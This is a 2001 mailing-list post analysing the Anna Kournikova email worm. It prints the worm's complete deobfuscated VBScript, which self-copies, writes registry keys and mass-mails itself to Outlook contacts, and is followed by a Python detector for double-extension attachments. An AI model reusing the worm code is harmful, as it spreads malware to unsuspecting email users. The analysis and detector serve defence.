Vulnerability Development mailing list archives
unobfuscation of AnnaKournikova.jpg. vee bee ess worm
From: rpc <h () ckz org>
Date: Mon, 12 Feb 2001 14:42:03 GMT
Hi All,

I've heard of several reports of this trojan popping up, but I haven't found much information on it, so I decided to unobfuscate the source and have a look at it. Below is the payload of the worm. Obfuscated variable names have been translated into more meaningful names.

-----Begin AnnaKournikova.jpg. v & b & s ---------------
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set shellobject = CreateObject("WScript.Shell")
shellobject.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set filesystem= Createobject("scripting.filesystemobject")
filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
if shellobject.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
  mail_trojan()
end if
if month(now) =1 and day(now) =26 then
  shellobject.run "Http://www.dynabyte.nl",3,false
end if
Set wormfile= filesystem.opentextfile(wscript.scriptfullname, 1)
payload= wormfile.readall
wormfile.Close
Do
  If Not (filesystem.fileexists(wscript.scriptfullname)) Then
    Set newfile= filesystem.createtextfile(wscript.scriptfullname, True)
    newfile.writepayload
    newfile.Close
  End If
Loop

Function mail_trojan()
  On Error Resume Next
  Set outlook = CreateObject("Outlook.Application")
  If outlook= "Outlook"Then
    Set mapi=outlook.GetNameSpace("MAPI")
    Set addresses= mapi.AddressLists
    For Each address In addresses
      If address.AddressEntries.Count <> 0 Then
        count = address.AddressEntries.Count
        For I= 1 To count
          Set email = outlook.CreateItem(0)
          Set entry = address.AddressEntries(I)
          email.To = entry.Address
          email.Subject = "Here you have, ;o)"
          email.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
          set attachment=email.Attachments
          attachment.Add filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
          email.DeleteAfterSubmit = True
          If email.To <> "" Then
            email.Send
            shellobject.regwrite "HKCU\software\OnTheFly\mailed", "1"
          End If
        Next
      End If
    Next
  end if
End Function
'Vbswg 1.50b
----------------------------------------------

hasta,
--rpc
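Added example, not part of the original post: a mail-gateway style check for the attachment-naming trick this sample relies on (a script extension hidden behind an image extension, as in AnnaKournikova.jpg.vbs). It generalizes beyond this one filename to other decoy/script extension pairs; the extension lists, function names and the sample message are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage

# Extensions that Windows Script Host or the shell runs on double-click.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
               ".bat", ".cmd", ".scr", ".pif", ".exe", ".com"}
# Harmless-looking extensions used as a decoy in front of the real one.
DECOY_EXTS = {".jpg", ".jpeg", ".gif", ".png", ".bmp",
              ".txt", ".doc", ".pdf", ".mp3", ".avi"}

def deceptive_name(filename):
    """Return (decoy, real) if a script extension hides behind a decoy, else None."""
    # Windows ignores trailing dots and spaces, so strip them before splitting.
    parts = filename.strip().rstrip(". ").lower().split(".")
    if len(parts) < 3:
        return None
    # Padding spaces between the two extensions are a common variation.
    real, decoy = "." + parts[-1].strip(), "." + parts[-2].strip()
    if real in SCRIPT_EXTS and decoy in DECOY_EXTS:
        return decoy, real
    return None

def flag_attachments(raw_message):
    """Parse a raw RFC 5322 message and list attachments with deceptive names."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        name = part.get_filename()  # None for body and container parts
        if name and deceptive_name(name):
            hits.append(name)
    return hits

def build_sample():
    """Constructed test message: placeholder attachments, no worm code."""
    msg = EmailMessage()
    msg["From"] = "alice@example.com"
    msg["To"] = "bob@example.com"
    msg["Subject"] = "Here you have, ;o)"
    msg.set_content("Hi:\r\nCheck This!\r\n")
    msg.add_attachment(b"' constructed placeholder\r\n", maintype="application",
                       subtype="octet-stream", filename="AnnaKournikova.jpg.vbs")
    msg.add_attachment(b"\xff\xd8\xff\xe0", maintype="image",
                       subtype="jpeg", filename="holiday.jpg")
    return msg.as_bytes()

if __name__ == "__main__":
    print(flag_attachments(build_sample()))
```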